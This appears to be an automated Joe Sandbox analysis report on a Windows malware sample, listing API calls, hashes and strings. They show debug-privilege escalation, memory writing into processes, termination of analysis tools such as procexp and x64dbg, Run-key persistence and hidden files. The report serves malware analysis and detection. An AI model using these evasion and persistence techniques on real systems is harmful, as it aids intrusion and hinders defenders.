                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                                                  • API String ID: 2379135442-2896544425
                                                                                                                                                                                                  • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                  • Instruction ID: 799eb3d35890b32adab7d53f454706652c98f0635d02b7ba5e9719119017753a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8415AB3628A8186F350CB51F54976AB7A0FBC4794F504138EA8997AA8CFBDD448CF00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                  • API String ID: 4073123320-2766056989
                                                                                                                                                                                                  • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                  • Instruction ID: cef55e98ebf0c69335015175ce2dbd246b315c54d17bdf6b9c7537d50b9b867e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8741E17661CA8986E7B0CB15E54536AB7A0F788B88F104025EACD93B58DF7DD4488B40
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF673521D19
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                                                  • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                  • Instruction ID: ea33105086c14a34283b8e9dc07dc9c4e75e7fc5e1a3cf090403aefed3ee2e04
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4671E7B662CA81C2F750CB54F99632AB7A0FBC4795F501035FA8E93A68CF7CD5448B00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2693768547-0
                                                                                                                                                                                                  • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                  • Instruction ID: f4806e52c35878a711c47151b4c64e93dfb167f21e65489974c2c0d28f37ef16
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0581E9B661CB8186EB60CB56F58536AB7A0FBC9B91F104135EE9D93B68DF7CD0448B00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF6735245C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523117), ref: 00007FF67352460C
                                                                                                                                                                                                    • Part of subcall function 00007FF6735245C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523117), ref: 00007FF673524649
                                                                                                                                                                                                    • Part of subcall function 00007FF6735245C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523117), ref: 00007FF673524654
                                                                                                                                                                                                    • Part of subcall function 00007FF673523B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67352311C), ref: 00007FF673523BC7
                                                                                                                                                                                                    • Part of subcall function 00007FF673523B84: RegSetValueExW.ADVAPI32 ref: 00007FF673523BFD
                                                                                                                                                                                                    • Part of subcall function 00007FF673523B84: RegCloseKey.ADVAPI32 ref: 00007FF673523C0C
                                                                                                                                                                                                    • Part of subcall function 00007FF673523C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF673523C3C
                                                                                                                                                                                                    • Part of subcall function 00007FF673523E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF673523E37
                                                                                                                                                                                                    • Part of subcall function 00007FF673523E24: Process32FirstW.KERNEL32 ref: 00007FF673523E6A
                                                                                                                                                                                                    • Part of subcall function 00007FF673523E24: CloseHandle.KERNEL32 ref: 00007FF673523E7C
                                                                                                                                                                                                    • Part of subcall function 00007FF673523E24: wcscmp.MSVCRT ref: 00007FF673523E91
                                                                                                                                                                                                    • Part of subcall function 00007FF673523E24: OpenProcess.KERNEL32 ref: 00007FF673523EA7
                                                                                                                                                                                                    • Part of subcall function 00007FF673523E24: TerminateProcess.KERNEL32 ref: 00007FF673523ECA
                                                                                                                                                                                                    • Part of subcall function 00007FF673523E24: CloseHandle.KERNEL32 ref: 00007FF673523ED8
                                                                                                                                                                                                    • Part of subcall function 00007FF673523E24: Process32NextW.KERNEL32 ref: 00007FF673523EEB
                                                                                                                                                                                                    • Part of subcall function 00007FF673523E24: CloseHandle.KERNEL32 ref: 00007FF673523EFD
                                                                                                                                                                                                    • Part of subcall function 00007FF6735239B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF673523B0C), ref: 00007FF6735239E4
                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF6735231C6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                  • API String ID: 2853470409-928700279
                                                                                                                                                                                                  • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                  • Instruction ID: 2171b74098b6a8a938c782430d79c6249117c514e15c0e4967d3b9a08af624bb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC2162E2B3894295FA04EB20EA935B863A0AF60750F900631E45DE22E6DF7DF9098641
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                                                  • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                  • Instruction ID: 502145b64caa129fe03db371f596b00a4d24e0316bb50a81a006879db5b0a973
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0201A567A2CA8281F720DB11E95627D6760FB9CB99F440131E94EE2665CF3CD5859600
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                                                  • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                  • Instruction ID: 9ea8f4915bf1e342e45b6bc16978888e345067fce3d58b99f03cc7aa981aa04f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A21FEB2A2CAC681F770DB11F94A36AA360FFD4B54F004235D99E926A9DF3DD449CB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                                                  • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                  • Instruction ID: 03ad04a37d00aed6303486a86eac32118ad8c6e5b8f2084be97f4bf5d634e854
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 240196A7A2CA8682F724DB21E95627E6370FFD8B45F400535ED8EE6679CF3CD5448600
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                                                  • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                  • Instruction ID: 47da29ace84b5bbf000b2915f4ef127ee1b2e1d3e73959d5480c8792ff160267
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2731AAB662CAC585E770DB19E4997AAB3A1F788B40F400235DA8DD3B68DF3DD554CB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                  • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                  • API String ID: 779948276-85274793
                                                                                                                                                                                                  • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                  • Instruction ID: fd6c07bbf28cbcf12892514f398fbbb475f37b4f3257a63e0e09e5621e8b9da9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC01E976628A808AE750CB14F44571ABB64F788794F901225EBCD93B68DF7DC145CF00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                                                  • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                  • Instruction ID: d4530b8b575845d041565cff2997513721733517769a4f99d6f00fd86012e676
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F110CB2A2CA9682F770CB21E58936A63A0FB94754F004335D69D96698DF3DD544CB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                  • API String ID: 779948276-1428018034
                                                                                                                                                                                                  • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                  • Instruction ID: 87648c9d4a09a3753d6e9b691d9a4b9c0314fa6bf6b5c46dbbfb972031c997bf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0116372628B8086E790CB14F54162A77A0FB847A0F105330F9AE93BE8DF7CD044CB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF67352390D
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523922
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523935
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523945
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523958
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF67352396D
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523980
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523995
                                                                                                                                                                                                    • Part of subcall function 00007FF6735246E4: CreateFileW.KERNEL32 ref: 00007FF67352472B
                                                                                                                                                                                                    • Part of subcall function 00007FF6735240E4: GetCurrentProcess.KERNEL32 ref: 00007FF67352414B
                                                                                                                                                                                                    • Part of subcall function 00007FF6735240E4: OpenProcessToken.ADVAPI32 ref: 00007FF67352415E
                                                                                                                                                                                                    • Part of subcall function 00007FF6735240E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF673524186
                                                                                                                                                                                                    • Part of subcall function 00007FF6735240E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6735241B1
                                                                                                                                                                                                    • Part of subcall function 00007FF6735240E4: CloseHandle.KERNEL32 ref: 00007FF6735241BC
                                                                                                                                                                                                    • Part of subcall function 00007FF6735240E4: OpenProcess.KERNEL32 ref: 00007FF6735241D1
                                                                                                                                                                                                    • Part of subcall function 00007FF6735240E4: CloseHandle.KERNEL32 ref: 00007FF673524249
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF673523037
                                                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF67352304A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                  • API String ID: 3992431006-2286007224
                                                                                                                                                                                                  • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                  • Instruction ID: 6424dd0554abbd375eddedb83fdfe2c4efc7f307b8e688ff0e65db69a5737005
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E111E8A2A28A8385F710DB14EA473A977A0FB88704F404135D58CE766ADF7CE0598B80

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:23.2%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:482
                                                                                                                                                                                                  Total number of Limit Nodes:5
